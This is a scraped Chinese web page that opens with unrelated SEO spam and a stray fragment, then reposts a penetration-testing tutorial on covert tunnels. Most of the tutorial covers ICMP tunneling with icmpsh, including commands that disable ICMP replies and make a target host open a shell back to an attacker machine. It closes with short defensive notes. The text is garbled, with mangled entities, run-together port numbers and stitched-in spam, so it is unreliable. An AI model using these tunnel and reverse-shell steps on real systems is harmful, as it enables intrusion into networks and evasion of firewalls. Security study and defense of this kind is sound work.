郑州网站模板,专注番禺网站优化,网站布局框架,广告公司属于什么行业hidden#xff1a;是否完全隐藏控制面板#xff0c;还有很多设置参数#xff0c;比如也可以设置显示面板#xff0c;然后设置宽高WIDTH“整数” 和 HIGH“整数”。1. 隐藏通信隧道基础1.1隐藏通信隧道技术概述常用的隧道#xff1a;网络层#xff1a;IPv6隧道#xff0c… hidden是否完全隐藏控制面板还有很多设置参数比如也可以设置显示面板然后设置宽高WIDTH“整数” 和 HIGH“整数”。1. 隐藏通信隧道基础1.1隐藏通信隧道技术概述常用的隧道网络层IPv6隧道ICMP隧道GRE隧道传输层TCP隧道UDP隧道常规端口转发应用程SSH隧道HTTP隧道HTTPS隧道DNS隧道1.2 判断内网的连通性综合判断各种协议(TCP,HTTP,DNS,ICMP)及端口通信的情况。常用的允许流量出的端口有 80808044353110123等。内网连通性判断方法1ICMP协议、执行命令 ping “2,TCP协议netcat(nc)誉为瑞士军刀通过使用TCP或UDP协议的网络连接读写数据使用nc工具执行 nc 3HTTP协议curl是利用URL规则在命令行下工作的综合传输工具支持文件下载和上传 在windows系统中需要安装命令curl 链接https://pan.baidu.com/s/1uBF8eDXI9nBJXB2tbqikpQ提取码zyx14DNS协议dns连通性常用命令 nslookup和dignslookup是windows自带 dns探测命令在没有指定vps-ip时nslookup会从系统网络中的TCP/IP属性中读取DNS服务器的地址输入 nslookup 按回车键 输入 help命令。dig是linux自带的命令 输入dig -h显示帮助信息dig命令使用详解2. 网络层隧道技术在网络层中 两个常用的的隧道协议是IPv6 和IMCP2.1 IPv6隧道用来代替现行的IPv4协议的一种新IP协议防御IPv6隧道攻击的方法了解IPv6的具体漏洞结合其他协议通过防火墙和深度防御系统过滤IPv6通信提高主机和应用程序的安全性2.2 ICMP隧道ICMP隧道简单实用是一个比较特殊的协议 常见的ICMP消息为ping命令的回复将TCP/UDP数据封装到ICMP的ping数据据包中穿过防火墙实现不受限制的网络访问** icmpsh**使用简单不需要管理员权限使用git clone命令下载icmpsh 下载地址安装python的impacket类库 以便对TCP,UDP,ICMP,IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerbers,WML,LDAP等协议进行访问安装python-impacketapt-get install python-impacket因为icmpsh工具会替代系统本身的ping命令的应答程序需要关闭本地系统的ICMP应答(如果要恢复系统应答则设置为0)否则shell的运行会不稳定(表现为一直刷屏无法进入交互输入)。sysctl -w net.ipv4.icmp_echo_ignore_all1输入 ./run.sh 并运行会提示出现输入目标的IP地址(目标主机的公网IP地址)在目标主机上查看ip地址输入如下命令icmpsh.exe -t 192.168.227.137(攻击机ip) -d 30 -s 128在目标主机运行以上命令即可在VPS中看到 192.168.227.133得shell。防御ICMP隧道攻击的方法网络管理员会阻止ICMP通信进入站点在出站方向 ICMP通信是被允许的目前大多数的网络和边界设备不会过滤ICMP流量使用ICMP隧道时会产生大量的ICMP数据包可以通过wireshark进行ICMP数据包分析已检测恶意ICMP流量版权声明本文为CSDN博主「Kris Alex」的原创文章遵循CC 4.0 BY-SA版权协议转载请附上原文出处链接及本声明。原文链接https://blog.csdn.net/Kris__zhang/article/details/106743675一如既往的学习一如既往的整理一如即往的分享。感谢支持【好书推荐】2020hw系列文章整理(中秋快乐、国庆快乐、双节快乐)HW中如何检测和阻止DNS隧道ctf系列文章整理日志安全系列-安全日志【干货】流量分析系列文章整理【干货】超全的 渗透测试系列文章整理【干货】持续性更新-内网渗透测试系列文章【干货】android安全系列文章整理扫描关注LemonSec